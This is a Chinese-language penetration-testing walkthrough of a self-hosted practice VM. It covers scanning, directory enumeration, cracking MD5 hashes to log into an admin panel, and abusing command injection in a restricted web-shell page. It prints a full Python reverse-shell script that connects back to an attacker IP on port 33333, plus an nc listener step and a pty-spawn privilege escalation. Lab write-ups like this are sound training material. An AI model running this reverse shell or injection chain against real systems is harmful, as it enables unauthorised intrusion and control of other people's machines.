一、 收集信息
1、 扫描存活主机,找到目标机的ip
2、 扫描目标机的端口信息。
说明可以通过80或8080来访问它
3、 查看一些指纹信息
4、因为是自己搭的所以不需要被动收集
二、 web渗透
1、通过访问发现没有神什么可用信息,就两个页面,审查里面元素也没有可用信息。
2、 扫目录
扫出来目录不多,可以打开看看,也可以用自己的字典
多了一条
http://192.168.88.128/robots.txt
3、 自己尝试敏感目录
3.1、发现后台
3.1.1、尝试弱口令登录
结果失败
也可以爆破,但是用户名和密码都知道,很难。
3.1.2、审查元素
好像32md5,但是通过md5解不出来
最后发现浏览器不一样,这个值也不一样,感觉放弃
3.2、查看其他页面最终发现
3.2.1、解密md5
没钱的话,去其他网站解密
3.2.2、通过上面发现这两条md5的对应的是
3.2.3、猜测@前面的是他的账号,然后尝试登陆。
nick--------bulldog
sarah-------bulldoglover
登陆成功。
3.2.4、 再次访问web-shell页面
但是只能执行上面的命令。其他的命令不可以。所以需要获取shell
三、 获取shell
1、发现有命令注入
2、前面信息收集发现他是python写的,所以可以执行python脚本,我们用echo写一个python脚本,来反弹shell。
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.88.141",33333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
等等
3、然后在kali用nc监听33333端口,在执行pwd&1.py
执行pwd&1.py
4、 得到shell
5、 但是发现权限是不够的
四、 提权
1、查看用户信息
cat etc/passwd
发现这两个用户值得关注
2、看家目录
每个都进去查看
3、 最后发现
打开是数据流看不懂
利用strings查看可执行文件中的内容;(strings命令用来提取和显示非文本文件中的文本字符串)
得到:SUPERultHimatePASHSWORDyouHCANTget 尝试去掉其中的H
SUPERultimatePASSWORDyouCANTget
意思是:你得到了特别伪装的最终密码
4、 尝试密码
su命令不能执行;
用python命令打开一个新的终端,尝试进行提权,输入命令: python -c ‘import pty; pty.spawn("/bin/bash")’
提权成功